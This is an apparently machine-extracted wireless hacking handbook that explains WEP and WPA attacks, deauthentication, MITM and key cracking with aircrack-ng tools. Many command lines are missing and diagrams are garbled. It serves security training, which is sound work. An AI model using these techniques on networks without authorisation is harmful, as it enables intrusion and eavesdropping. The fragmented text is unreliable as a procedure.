Professional Documents
Culture Documents
PRE SE NTS
The authors and the publisher have taken care to ensure the information in
this publication is reliable and complete, but cannot assume responsibility
for its use and for any related potential breach of patents or copyright.
The authors and the publisher cannot assume responsibility for any
consequences or damage in connection with the use of the information in
this publication.
CSH Press
82-500 Kwidzyn
Dluga 27, Poland
e-mail: contact@hackingschool.com
Legal information . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
Would like to draw your attention to the fact that this handbook,
live training movies and software included can be used only to
protect your IT environment. Conducting an attack on other IT
system without the permission of its respective owner is penalized
by the federal Computer Fraud and Abuse Act. If you live outside
the United States, please refer to your local law.
“(a) Whoever—
(1) having knowingly accessed a computer without authorization or
exceeding authorized access, and by means of such conduct having
obtained information that has been determined by the United States
Government pursuant to an Executive order or statute to require
protection against unauthorized disclosure for reasons of national defense
or foreign relations, or any restricted data, as defined in paragraph y.
8 Legal information
of section 11 of the Atomic Energy Act of 1954, with reason to believe that
such information so obtained could be used to the injury of the United
States, or to the advantage of any foreign nation willfully communicates,
delivers, transmits, or causes to be communicated, delivered, or
transmitted, or attempts to communicate, deliver, transmit or cause to
be communicated, delivered, or transmitted the same to any person not
entitled to receive it, or willfully retains the same and fails to deliver it to
the officer or employee of the United States entitled to receive it;
(2) intentionally accesses a computer without authorization or exceeds
authorized access, and thereby obtains—
(A) information contained in a financial record of a financial
institution, or of a card issuer as defined in section 1602 (n) of title 15,
or contained in a file of a consumer reporting agency on a consumer,
as such terms are defined in the Fair Credit Reporting Act
(15 U.S.C. 1681 et seq.);
(B) information from any department or agency of the United States;
or
(C) information from any protected computer;
(3) intentionally, without authorization to access any nonpublic
computer of a department or agency of the United States, accesses such
a computer of that department or agency that is exclusively for the use
of the Government of the United States or, in the case of a computer not
exclusively for such use, is used by or for the Government of the United
States and such conduct affects that use by or for the Government of the
United States;
(4) knowingly and with intent to defraud, accesses a protected computer
without authorization, or exceeds authorized access, and by means of such
conduct furthers the intended fraud and obtains anything of value, unless
the object of the fraud and the thing obtained consists only of the use of
the computer and the value of such use is not more than $5,000 in any
1-year period;
(5)
(A) knowingly causes the transmission of a program, information,
code, or command, and as a result of such conduct, intentionally
causes damage without authorization, to a protected computer;
9
(c) The punishment for an offense under subsection (a) or (b) of this
section is—
(1)
(A) a fine under this title or imprisonment for not more than ten years,
or both, in the case of an offense under subsection (a)(1) of this section
which does not occur after a conviction for another offense under this
section, or an attempt to commit an offense punishable under this
subparagraph; and
10 Legal information
(B) a fine under this title or imprisonment for not more than twenty
years, or both, in the case of an offense under subsection (a)(1) of this
section which occurs after a conviction for another offense under this
section, or an attempt to commit an offense punishable under this
subparagraph;
(2)
(A) except as provided in subparagraph (B), a fine under this title or
imprisonment for not more than one year, or both, in the case of an
offense under subsection (a)(2), (a)(3), or (a)(6) of this section which
does not occur after a conviction for another offense under this
section, or an attempt to commit an offense punishable under this
subparagraph;
(B) a fine under this title or imprisonment for not more than 5 years, or
both, in the case of an offense under subsection (a)(2), or an attempt to
commit an offense punishable under this subparagraph, if—
(i) the offense was committed for purposes of commercial
advantage or private financial gain;
(ii) the offense was committed in furtherance of any criminal or
tortious act in violation of the Constitution or laws of the United
States or of any State; or
(iii) the value of the information obtained exceeds $5,000; and
(C) a fine under this title or imprisonment for not more than ten
years, or both, in the case of an offense under subsection (a)(2),
(a)(3) or (a)(6) of this section which occurs after a conviction for
another offense under this section, or an attempt to commit an
offense punishable under this subparagraph;
(3)
(A) a fine under this title or imprisonment for not more than five years,
or both, in the case of an offense under subsection (a)(4) or (a)(7) of this
section which does not occur after a conviction for another offense
under this section, or an attempt to commit an offense punishable
under this subparagraph; and
(B) a fine under this title or imprisonment for not more than ten years,
or both, in the case of an offense under subsection (a)(4), or (a)(7) of
this section which occurs after a conviction for another offense under
11
(d)
(1) The United States Secret Service shall, in addition to any other agency
having such authority, have the authority to investigate offenses under this
section.
(2) The Federal Bureau of Investigation shall have primary authority
to investigate offenses under subsection (a)(1) for any cases involving
espionage, foreign counterintelligence, information protected against
13
(C) a credit union with accounts insured by the National Credit Union
Administration;
(D) a member of the Federal home loan bank system and any home
loan bank;
(E) any institution of the Farm Credit System under the Farm Credit
Act of 1971;
(F) a broker-dealer registered with the Securities and Exchange
Commission pursuant to section 15 of the Securities Exchange Act
of 1934;
(G) the Securities Investor Protection Corporation;
(H) a branch or agency of a foreign bank (as such terms are defined in
paragraphs (1) and (3) of section 1(b) of the International Banking Act
of 1978); and
(I) an organization operating under section 25 orsection 25(a)
of the Federal Reserve Act;
(5) the term “f inancial record” means information derived from
any record held by a financial institution pertaining to a customer’s
relationship with the financial institution;
(6) the term “exceeds authorized access” means to access a computer with
authorization and to use such access to obtain or alter information in the
computer that the accesser is not entitled so to obtain or alter;
(7) the term “department of the United States” means the legislative or
judicial branch of the Government or one of the executive departments
enumerated in section 101 of title 5;
(8) the term “da mage” means any impairment to the integrity
or availability of data, a program, a system, or information;
(9) the term “government entity” includes the Government of the
United States, any State or political subdivision of the United States, any
foreign country, and any state, province, municipality, or other political
subdivision of a foreign country;
(10) the term “conviction” shall include a conviction under the law of any
State for a crime punishable by imprisonment for more than 1 year, an
element of which is unauthorized access, or exceeding authorized access,
to a computer;
15
(11) the term “loss” means any reasonable cost to any victim, including the
cost of responding to an offense, conducting a damage assessment, and
restoring the data, program, system, or information to its condition prior
to the offense, and any revenue lost, cost incurred, or other consequential
damages incurred because of interruption of service; and
(12) the term “person” means any individual, firm, corporation,
educational institution, financial institution, governmental entity, or legal
or other entity.
(h) The Attorney General and the Secretary of the Treasury shall report
to the Congress annually, during the first 3 years following the date of the
enactment of this subsection, concerning investigations and prosecutions
under subsection (a)(5).
(i)
(1) The court, in imposing sentence on any person convicted of a violation
of this section, or convicted of conspiracy to violate this section, shall
16 Legal information
enter any other IT system during your tests, you have to cease
them and inform the administrator.
– The results of the tests should be kept away from any third
person.
Additional legal info can be found in the full text of the federal
Computer Fraud and Abuse Act. Please note that the information
stated herein is valid at the time of publication and it may be subject
to change at any time.
1
Chapter 1
Introduction
to wireless networks
Chapter outline:
1. Introduction
2. Wireless transmission standards
3. Wireless network types
4. Encryption and authentication standards
5. Wireless network interface cards in Linux
Introduction
Anyone using the Internet is well-aware of all wireless networking
hiccups and internal flaws. We are annoyed with network
downtimes and the increased break-in likelihood (the traditional
wired networks are less susceptible in that regard). There can
be many different outcomes of an intrusion. Usually, the damage
to be feared is data loss – but keep in mind eavesdroppers can
20 Chapter 1 – Introduction to wireless networks
You need:
802.11a
data rate [MB/s] 12 24 36 48 54
range [m] 150 80 50 30 15
802.11b
data rate [MB/s] 2 5,5 11
range [m] 150 90 45
The first major standard update to catch on was 802.11b, and even
today devices that use this networking technology have not been
fully superseded. The strength of 802.11b was longer range, resulting
from a lowered frequency (at 2.4 GHz). The max speed is 11 Mbps,
but usable data (meaningful information, as opposed to for example
lost packets) only equals half of sent data.
First and foremost, wireless networks are not isolated from one
another by any means (like a cable can provide isolation in wired
networks). By contrast, wireless networks all share a medium, which
is the air. Very often neighboring residences or organizations set up
separate Internet connectivity. Channels have been developed to
negate the effects of antennas overlapping and causing interference.
Consider the way cellular networks, television or the radio
technology works with radio waves emitted over a shared medium,
the open air: nonetheless two or more wireless networks do not
create interference. The simple cause for this is that the signals are
broadcast over different frequencies: this is the reason we talk of the
2.4–2.5 GHz band rather than a specific frequency.
The issues of range and reach are more emphatic here than with
other networks (such as GSM). A primary concern is keeping
two devices that want to communicate over the network in close
proximity: they need to ‘see’ each other. In practice, this means
that when you stand next to your AP and look at your computer
(equipped with a wireless network interface card), it must be
within your eyesight (that said, a thin wall or a glass door are not
big roadblocks in transmission). No obstacles like thick walls or
interfering devices must be in between these objects. If there is no
802.11 wireless network types 25
obvious way you can plan your network to avoid these obstacles and
if waves cannot bounce off them and propagate in a room, consider
setting up an additional AP to work as a bridge between the initial
AP and an end point.
# airmon-ng
The parameters:
mode: sets the operating mode of the device (type a selected mode)
Wireless security
(half) measures:
An overview
Chapter outline:
1. MAC address filtering
2. Disabling ESSID broadcast
3. Limiting wireless coverage
The parameters:
Right: you know that a MAC address can be forged and know how
to spoof it. But what hardware address should be selected? The new
MAC address filtering 33
address must be in the MAC address pool assigned for the network.
All you need to do is to check available MAC addresses in the pool.
The tool for the job is the airodump-ng application (to be precise,
a sniffer). The program can look up the hardware addresses of
hosts that are active at the time of running it. Before you start it,
the interface operating mode needs to be set to monitor. Run this
command:
The parameters:
# airodump-ng wlan1
The parameters:
Before we go any further, there are some errors that can crop up as
early as this stage. If you have not taken care to get the right drivers,
your wireless network interface will not be set in monitor mode,
prompting an error message.
date and time. The next line provides titles for each column, and the
lines after it show detected access points.
BSSID: the MAC address of the access point the client is associated
with
PWR: signal level (its range depends on the card driver: the higher
the value, the stronger the signal)
The first is to wait for a user to log in (the network name is sent
in clear text at logons). The other, much more efficient solution
requires a would-be intruder to disconnect a user, for example using
aireplay-ng from the aircrack-ng toolkit. The tool allows you to
run certain types of attack on WLANs. Type this command in the
terminal in order to deauthenticate a client:
The parameters:
This attack mode works not only with open networks (that use
no authentication and encryption). Why is that? The pivotal item
in the attack was ‘telling’ your target it has been disconnected.
Aireplay generates a deauthentication packet and ‘signs’ it with the
MAC address of the access point. No encryption is applied at the
level at which these commands run, so you do not need a key to
communicate. The levels are referred to as layers and were defined
as early as 1983. The 7-layer model has been developed by the
International Organization for Standardization (ISO). Information
is passed starting at the application layer in one station proceeding
hierarchically from one layer to another layer (implemented by
protocols). The following is an example of opening a web page
on a wireless network: http → tcp → ip → 802.11 → cable →
ADSL → Ethernet → ip → tcp → http. Layers have been introduced as
a means of facilitating the communication between different devices
and systems via protocols that might be developed by different
vendors.
38 Chapter 2 – Wireless security (half) measures: An overview
Application Application
Presentation Presentation
Session Session
Transport Transport
Network Network
Chapter outline:
1. Introduction
2. DoS: RF jamming
3. DoS: CSMA/CA jamming
4. DoS: Deauthentication attack
5. Wireless MITM
Introduction
Even a well-protected network that uses an encryption model
you are incapable of cracking is still not fully resistant to some
types of attacks. No wireless network has been and probably will
never be completely immune to DoS (Denial-of-Service) attacks,
and no precautions can protect you from a would-be attacker
equipped with an outsized antenna pointed in the direction
40 Chapter 3 – Wireless network attacks independent of used encryption
DoS: RF jamming
The Denial-of-Service (DoS) attack works by disrupting a targeted
service and preventing it from carrying out its tasks (if the victim is
an access point, it will not be able to receive and send traffic to other
networking devices). The victim becomes overloaded as a result.
DoS attacks require a powerful machine that can generate requests
faster than the victim can respond to them: not plain sailing any
means.
a simple microwave oven can fit the bill (even though the metal case
and wire-meshed window dramatically reduce the radiation getting
out). Check for microwaves and similar home appliances to make
sure your WLAN topology is free of interrupters.
DoS: CSMA/CA jamming 43
An example attack:
Opis parametrów:
The parameters:
Wireless MITM
The MITM (Man-in-the-Middle) attack occurs when an
intermediary of sorts is inconspicuously placed in line between
a sender and receiver. This intermediary is an attacker. The Man-
in-the-Middle attacker captures packets sent to an AP, modifies
them and forwards them to the AP. The same can be done with
communications transmitted from an AP to a client.
The wireless key gives WLAN access to anyone who knows it. If
a rogue hacker AP responds faster than the real AP, the malicious
access point will ‘seize’ a client. In the next step, the rogue AP connects
to the rightful access point and sends all information it receives from
its associated client to the original AP. Transparently, all frames sent or
received by a client may be sniffed and changed if desired.
WEP attacks
Chapter outline:
1. WEP encryption
2. Chopchop
3. Keystream reuse
1. packetforge-ng
1. Fragmentation attack
2. Fake authentication
2. easside-ng
4. FMS, KoreK attacks, PTW
1. Interactive packet replay
2. ARP request attack
5. Caffe Latte Attack
48 Chapter 4 – WEP attacks
WEP encryption
To understand the science behind attacks against WEP, start with
getting the knack of the encryption process used in WEP (Wired
Equivalent Privacy), a system designed to provide as much security
as a wired connection.
WEP makes use of the RC4 cipher, which takes the key and
initialization vector values to generate a pseudorandom stream
of bits that corresponds in length to the length of a sent packet.
This value is combined with the plaintext to receive a similarly
pseudorandom output ready to be sent. The (24-bit) initialization
vector is a random number in the range from 0 to 224 –1, or from 0 to
16,777,215. The solution ensures that two identical packets produce
a pair of different ciphertexts. Since attackers have to be assumed to
be well-versed in network protocols, they understand that packets
can be discovered based on how often they appear.
WEP encryption 49
For example, DNS queries are more popular than echo request
(pings). This fact enables you to make educated guesses about the
encrypted plaintext and can be exploited to crack a cipher. This
attack mode is known as the known-plaintext attack.
IV
Key
+ RC4 Keystream
Output
Packet
+ XOR
CRC32
XOR 0 1
0 0 1
1 1 0
The first argument is below the bolded XOR, the second is to the
right of it. Since the exclusive disjunction is a bitwise operation,
all arguments have to take either 0 or 1. The four fields that are
isolated from arguments represent the outputs of every possible
combination. As you can see, XOR is true (takes 1) if the inputs are
not alike (0, 1 and 1, 0) and takes 0 in the opposite scenario (0, 0 and
1, 1). XOR-ing can be reversed, which means that if you process an
output with an argument, the result is the missing argument:
RC4
0101 1100
KEYSTREAM
XOR
100
CIPHERTEXT IV
Chopchop
The chopchop attack name derives from the action that occurs in
this technique, that is cutting (chopping off) appropriate bytes from
packets to reveal the plaintext packet, and, consequently, reveal its
keystream in WEP-protected environments.
To understand this and the next attacks in this section, you need to
know how information is encrypted in WEP.
Chop off the last byte in a valid frame and calculate the checksum,
assuming the removed plaintext byte is 0. Send the edited message
to an AP. If the AP drops it, this means your A is not correct and you
need to re-calculate CRC32 with a different value for the missing
part. Repeat the procedure until there is a match. When successful,
continue using the method to reveal another value. But doesn’t it
all take too long? Chopchoping and similar attacks make use of
pure mathematics and the birthday paradox phenomenon. How
many people have to be in a group for the probability of at least two
persons sharing their birthday equal at least ½? At a glance, it seems
the answer is 365/2, however once you inspect this thoroughly, the
figure drops to just 23.
DATA A CRC(DATA+A)
Let’s say you have a WEP-protected network and want to see the
contents of selected packets or, whatever the reason, cannot use any
other way to capture a keystream needed to generate an ARP packet.
You can then fall back on the chopchop attack implemented in the
aireplay-ng utility included in aircrack-ng.
The parameters:
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._..“
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? Y
If you think this is a suitable packet, type y and press Enter. Soon
you’ll see the results, which will be similar to the sample output
below:
another attack that requires it. Note that the attack can be also used
to slowly read transmissions: it is enough to eavesdrop on traffic for
some time and try to decode the packets later.
The keystream can also be used to inject decrypted data into the
network.
56 Chapter 4 – WEP attacks
Keystream reuse
In this chapter we look at the packetforge-ng and easside-ng
applications. They will be examined in more detail below, but before
you go any further, let’s quickly recap what they can be used for.
Let’s now take a closer look at these programs and their usage and
launch some example attacks.
Packetforge-ng
The program creates packets and injects them into wireless
networks without knowing the key. A usage example is generating
ARP packets. ARP request packets are neat for cracking the wireless
key with the use of statistical methods that will be outlined later in
the book. To begin, run this command:
The parameters:
Fragmentation attack
Having captured a single data frame, a hacker can generate large
amounts of keystream for a specific initialization vector that can
later be used to send a crafted message.
Application
Presentation
Session
Transport
Data Link
MAC sublayer
(Media Access Control)
Physical
ARP (0x806)
0xAA 0xAA 0x03 0x00 0x00 0x00 ??
IP (0x800)
Thanks to this deduction, you can obtain the first eight bytes of
a keystream, remembering the keystream can be computed if
you XOR the plaintext and the ciphertext. Now, it’s time to fit in
fragmentation. You can divide a packet into 16 smaller fragments
at the most. A salient point is that each fragment is encrypted
individually as a stand-alone message: it follows that if you use
the same vector (the key is constant) for encryption, the reality is
that you are using the same keystream as well. Since you have
found the first 8 bytes of a keystream, the partitions you send will
be 8-byte. Choose a packet to send: let’s make it an ARP request.
Break it down into 8-byte subpackets and use each to encrypt the
revealed keystream. For an AP to be able to identify and reassemble
60 Chapter 4 – WEP attacks
the fragments, you need to set the ‘more fragments’ flag. In the
diagram below the flag is marked as MF.
known:
receiving: 0 SRC DST 1b9e17 SNAP ARP
The parameters:
Running this command will make the program wait for a data
packet to capture. When a data packet is found, it displays
information similar to the sample output below:
BSSID = 00:14:6C:7E:40:80
Dest. MAC = 00:0F:B5:AB:CB:9D
Source MAC = 00:D0:CF:03:34:8C
0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
62 Chapter 4 – WEP attacks
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....‘.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W‘.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q .D...w.....<R.
0x0070: 0505 933f af2f 740e ...?./t.
Fake authentication
A hacker may do without the wireless network key to successfully
authenticate. In the worst case scenario, with a WEP environment
enabling Shared Key Authentication, the adversary will need
a handful of keystream bytes.
Authentication request
Encrypted challenge
Authentication response
Easside-ng
An adversary with an Internet connection might be able to
successfully transmit and receive communications in a wireless
network without knowing its key. The requirements are that the
wireless network must have access the Internet and the attacker
must run dedicated software on an external server.
De
cr
des t and rypt
yp
te
tina add
IP
d
c
pa
a n packe to de
tion
ck
Ca pack
et
pt et
a
the an AP
ur
es
ew
Use
Buddy server
Attacker
Let’s now pen-test this idea. Start buddy-ng on a buddy server. If you
want, it can start on the client workstation.
# buddy-ng
The response:
buddy-ng
Waiting for connexion
Run this command on the host that uses a wireless card to access
the target network:
Where:
Handshake compl33t
Checking for internet... 1
Internet w0rx. Public IP 10.113.65.187
Rtt 77ms
These steps result in a new interface you can use for Internet
communications:
# ifconfig at0 up
# dhcpcd at0
FMS, KoreK attacks, PTW 69
The FMS, KoreK and PTW attacks use statistical analysis techniques
to crack WEP keys. We aim to offer a general overview of their mode
of operation rather than scrutinize the mathematics they use. If
you would like to learn more, check out the papers provided in the
bibliography section.
key: 50 41 53 53 57
FMS attack:
Weak IV 1 0A 80 BE 03 57
Weak IV 2 AF 41 B0 13 75
Weak IV 3 34 71 53 28 57
Weak IV 4 50 00 53 53 94
... Bit: 50 41 53 53 57
Weak IV 1000 50 41 28 42 68 Votes: 17 23 19 27 16
The parameters:
# aircrack-ng -K packets-01.cap
The parameters:
Opening packets-10.cap
Read 877949 packets.
Opening packets-10.cap
Reading packets, please wait...
Aircrack-ng 1.0
KB depth byte(vote)
0 0/ 1 01( 43) 19( 15) 6E( 15) 10( 13) 5F( 13) 0E( 12) 5E( 12) 8C( 12) 60( 5) DD( 5) 2B( 3) 2D( 3)
1 0/ 1 23( 196) FA( 39) D8( 33) 64( 31) 2A( 22) 70( 18) 29( 16) 63( 16) 73( 16) 81( 15) 83( 15) 28( 13)
2 0/ 1 45( 169) 0B( 27) 40( 20) 4B( 20) 30( 17) 20( 15) 42( 15) 10( 13) A0( 13) FE( 13) 01( 10) 02( 10)
3 0/ 1 67( 317) 78( 56) 06( 41) 79( 40) 98( 33) 14( 29) B8( 26) E6( 26) 0F( 24) EB( 24) 29( 23) 65( 23)
4 0/ 2 89( 164) 0B( 87) 30( 30) 79( 30) 3F( 25) 7D( 22) 58( 20) F4( 18) 46( 13) 8F( 13) 2A( 10) 4B( 10)
5 0/ 1 AB( 376) 79( 50) 7A( 44) 10( 35) E6( 32) 11( 29) 63( 24) 76( 23) AC( 23) AE( 23) B6( 21) 62( 19)
6 0/ 1 CD( 276) C6( 46) C5( 44) C2( 29) 64( 23) 03( 20) B9( 20) F8( 20) 40( 18) AD( 18) E5( 18) 8D( 15)
7 0/ 1 EF( 341) E3( 140) 23( 99) 3C( 64) 73( 54) 66( 48) 34( 47) 5B( 46) 2E( 45) 19( 44) 69( 44) 95( 42)
8 0/ 1 01( 285) 29( 90) F3( 87) EC( 54) 30( 38) 6B( 38) 6D( 38) 8B( 36) 63( 35) DC( 35) 12( 33) 41( 33)
FMS, KoreK attacks, PTW 73
9 1/ 2 35( 192) 02( 148) E6( 111) 7D( 99) DF( 88) E5( 82) CF( 78) 24( 75) 07( 67) DE( 64) 5A( 63) D4( 63)
10 1/ 1 01( 0) 02( 0) 03( 0) 04( 0) 05( 0) 06( 0) 07( 0) 08( 0) 09( 0) 0A( 0) 0B( 0) 0C( 0)
The depth field indicates the current key search, while the value
after the slash shows the number of alternative candidates. Next are
the votes associated with several most voted bytes. As expected, the
key byte values vary wildly. At the bottom is the cracked WEP key.
The output also states how likely this key is to be correct; however, it
is not a cast-iron estimate.
Where:
-w test: the prefix of the file name to which packets are written
74 Chapter 4 – WEP attacks
# aircrack-ng packets-01.cap
Where:
The parameters:
-w test: the prefix of the file name to which packets are written
The parameters:
Read 10 packets...
BSSID = 00:14:6C:7E:40:80
Dest. MAC = 00:40:F4:77:E5:C9
Source MAC = 00:0F:B5:34:30:30
0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 .“..\{06)...
Two WEP vulnerabilities are vital for the success of this attack.
The first flaw is the lack of a packet counter, which renders the
security protocol helpless in the face of a replay attack. The other
flaw is the fixed length packets have at encryption. ARP request
packets have a characteristic size, and so you are almost guaranteed
all packets with this size are ARP requests. Listen on a network until
you capture an ARP packet and retransmit it over and over as much
as you want.
The parameters:
-w test: the prefix of the file name to which packets are written
The parameters:
Only the read packets count (84 in the output) increments until
an ARP request is captured. After the program seizes an ARP
request (3 requests are seized in this particular output), it should
automatically start an injection of this packet. As it being replayed,
the sent packet number goes up and pps (packets per second) will
show different values. You can also tell the attack is successful when
the DATA counter in airodump-ng begins to rapidly increase.
Caffe Latte Attack 79
The parameters:
The other utility can be used as an alternative for the two previously-
described ways of obtaining initialization vectors.
The parameters:
WPA attacks
Chapter outline:
1. Introduction
2. WPA
3. WPA2
4. Rainbow tables
5. Brute force attack on WPA-PSK networks
6. DoS: Taking advantage of the MIC failure holdoff time
Introduction
With WEP deprecated as insecure, works began on a new standard
to replace it. 802.11i was developed in response, although it soon
became clear that the algorithms used in this WEP successor are
much more computationally intensive and could not be supported
on legacy hardware. As an interim solution, a slightly weaker
82 Chapter 5 – WPA attacks
WPA
WPA introduces a complicated hierarchical key structure. The most
important of the keys is the PMK (Pairwise Master Key). It can be
calculated in two ways. If WPA-PSK (WPA Personal) is enabled, the
key is loaded from local resources: otherwise, an external server is
used for authentication.
Association
EAP ID response
EAP ID request
EAP ID response EAP authentication request
PMK
PTK
The elaborate key hierarchy and the ways to derive the PMK were
mentioned above. The Pairwise Master Key is used to generate the
PTK (Pairwise Transient Key) and the GTK (Group Temporal Key).
Other than the PMK, which is passed to the PBKDF2 function (more
about it later), the following components are used to create the first
key (PTK): a fixed string, the access point and client MAC address,
as well as the nonces sent by client and access point, SNonce and
ANonce. The PTK is used to transmit messages between a client
and access point. The GTK meanwhile is used to encrypt broadcast
data traffic. Both keys are 512-bit in WPA, and if WPA2 is used, they
are 384-bit. The PTK and GTK are generated during the four-way
handshake, a type of negotiation whose name originates in the
exchange of four EAPOL-Key messages.
a SNonce and constructs the PTK using the sent ANonce. The key
is broken into several smaller keys, each having a different purpose.
Among those keys is the KCK (Key Confirmation Key), which helps
in generating the MIC (Message Integrity Code) computed using the
Michael algorithm.
Let’s now look at the WPA encryption diagram (figure 17). Rather
than do a simple concatenation of an IV and key, three values are
mixed. The first of them is the temporal key (TK), a part of the PTK.
Mixed with it are the transmitter MAC address (to avoid collisions)
and the 48-bit IV functioning now as a sequence counter. Note that
packets with IV numbers that are equal to or smaller than the last
accepted IV number will be rejected, preventing replay attacks.
86 Chapter 5 – WPA attacks
Key
MIC
mixing
II
WEP
Encrypted text
Figure 17: WPA encryption diagram
The above-mentioned inputs are mixed and then passed to the RC4
algorithm, just like in WEP.
WPA2
The key negotiation phase in WPA2 is identical to the four-way
handshake employed in WPA except for PMK size, now 384 bits.
This update is a by-product of dropping TMK keys. They have been
deemed redundant due to the omission of Michael (the CCMP
protocol has a built-in MIC generation function). Although as you
can see encryption has become more complicated overall, it also
delivers stronger security. IVs reappear in WPA2, but the name has
been changed to PNs (packet numbers). Similar to WPA, PNs are
successively increased, or incrementing, by 1 until they overflow.
The PN code is stored in CCMP headers together with the key ID of
an encrypted MPDU. The packet number also constructs a Nonce,
which includes the said packet number, sender MAC address and
the priority field (no longer used now: set to zero). The temporal
key, derived using the same method as in WPA, is passed to the
CCMP encryption block alongside the Nonce field, plaintext data
and AAD. Additional Authentication Data is a field that contains
information pertaining to all MAC header fields that should not
change in transit. The information includes source and destination
address. These inputs are processed by the CCMP function, a stream
processing-optimized AES algorithm variant in the CCM mode.
The AES (Advanced Encryption Standard) is a block cipher, and so
you need to feed it data in portions exactly 128 bytes in size. With
the modification, this is not necessary. The CCM mode takes into
account both earlier block encryption outputs and the counter
function output. The latter result is concatenated with MAC and
CCMP headers and next sent.
WPA2 89
PN
Plaintext MPDU
Construct Construct
NONCE AAD
Key
ID
Temporal key
Construct
CCMP CCMP encryption
header
II
Encrypted MPDU
Construct Construct
NONCE AAD
Temporal key
CCMP decryption
Plaintext
II
PN
Replay
check
Plaintext MPDU
Figure 19: CCMP decryption diagram
WPA2 91
All known WEP gaps have been dealt with on account of these
solutions. The only effective attack on WPA2 key today is the brute
force technique. A brute force attack might be launched offline
using a captured four-way handshake. To sniff this negotiation,
you might wait for a user to log on or launch a deauthentication
attack, same as in WEP. Brute force cracking itself is a time intensive
process unfortunately, which reflects on the cracking speed
(depending on hardware type, it averages about 100 passwords
per second). The only attack you can successfully run in these
circumstances is the dictionary attack. The low performance boils
down to the necessity of applying the PBKDF2 function to generate
the PTK. Repeating the HMAC SHA-1 hash function 4,096 times
makes it extremely time-consuming.
The hash function has the task of processing input (key and ESSID)
in such a way that its result cannot be determined in any way other
than executing it. Besides, it is, or at least is supposed to be invertible,
which means that no information about the input should be derived
from the output. But before we go on to learn more about hash
functions, first let’s see a simple implementation of a brute force
attack against WPA.
The parameters:
The parameters:
The speed of this attack is very low, although can be boosted with
the use of ‘rainbow tables’. Rainbow tables is a misleading name in
this context, however. We are going to use a simple table containing
precomputed hashes (our PBKDF2 outputs) and the data used
to generate them (ESSID + password) as input in cowpatty and
aircrack-ng attacks.
Rainbow tables 93
Rainbow tables
High quality rainbow tables can considerably fast-track WPA
cracking. First, an explanation of hash functions (as used in WPA,
for example PBKDF2 or MD5) and how to defeat them. Hashing
transforms a string into a fixed-length value called a hash or
message digest. A 64-bit hash function outputs a 64-bit hash.
A peculiar property of these functions is that they are ‘suspected’ of
being one-way, which means that we still cannot engineer a reverse
function to derive the original text from a hash. On the other hand,
cracking options are not plenty for hash functions, with brute force,
collision and rainbow tables as your choices.
That said, the first of these methods is almost painfully slow. While
in theory you could prepare a table storing all hashes and their
plaintexts, let’s see how big the hash table for a 64-bit function would
need to be. There are 264 possible hashes, each 64 bits (8 bytes) in
size. Overall, it’s 264*23 B = 257 KB = 247 MB = 237 GB = 227 TB, or
roughly 134 million terabytes! A 1 TB hard drive costs about 100
dollars, so to store your table you would need to cough up more than
13 billion.
The newest of the attack methods are rainbow tables that have
the advantage of saving storage space at the cost of using more
94 Chapter 5 – WPA attacks
common ESSIDs used in the USA (1,000 values, for example) and
use a common password dictionary.
Cowpatty attack
This cowpatty dictionary attack tries to decrypt a captured four-way
handshake (stored in the test-01.cap file) using a precomputed hash
database (hackingschool).
Where:
Where:
The parameters:
The response:
importReading header...
Reading...
Updating references...
Writing...
CUDA-powered attacks
Chapter outline:
1. What is CUDA?
2. Drivers and development environment configuration
3. CUDA in action: WLAN attacks
4. Appendix A: CUDA-powered cracking of MD4/MD5 hashes
5. Appendix B: Wardriving experiment
What is CUDA?
CUDA (the Compute Unified Device Architecture) is
a parallel computing platform developed by NVIDIA
and implemented in newer models of multi-core
NVIDIA GPUs. For a full list CUDA-enabled GPUs, see
http://en.wikipedia.org/wiki/CUDA#Supported _ GPUs
100 Chapter 6 – CUDA-powered attacks
NVIDIA drivers
To ensure every operation in this section executes properly, first
configure your platform to meet our requirements.
All essential drivers and tools can be downloaded from our site
and installed in the Training Operating System v2.0 using this
command:
!
Note. If you are not running the Training Operating System v2.0
included, we cannot guarantee the tools are compatible with your
system. The package contains source code of all applications,
however note that compilation and setup details can vary slightly NOTE
from case to case.
Committing changes...
Preparing ############################## [100%]
Updating / installing
libxfixes3-devel-4.0.3-2pclos2007.i586 ############################## [100%]
libice6-devel-1.0.4-3pclos2007.i586 ############################## [100%]
libsm6-devel-1.0.3-2pclos2007.i586 ############################## [100%]
libxdamage-devel-1.1.1-2pclos2007.i586 ############################## [100%]
libxxf86vm-devel-1.0.1-4pclos2007.i586 ############################## [100%]
libmesagl1-devel-7.0.2-1pclos2007.i586 ############################## [100%]
libxt6-devel-1.0.5-2pclos2007.i586 ############################## [100%]
libxmu6-devel-1.0.4-1pclos2007.i586 ############################## [100%]
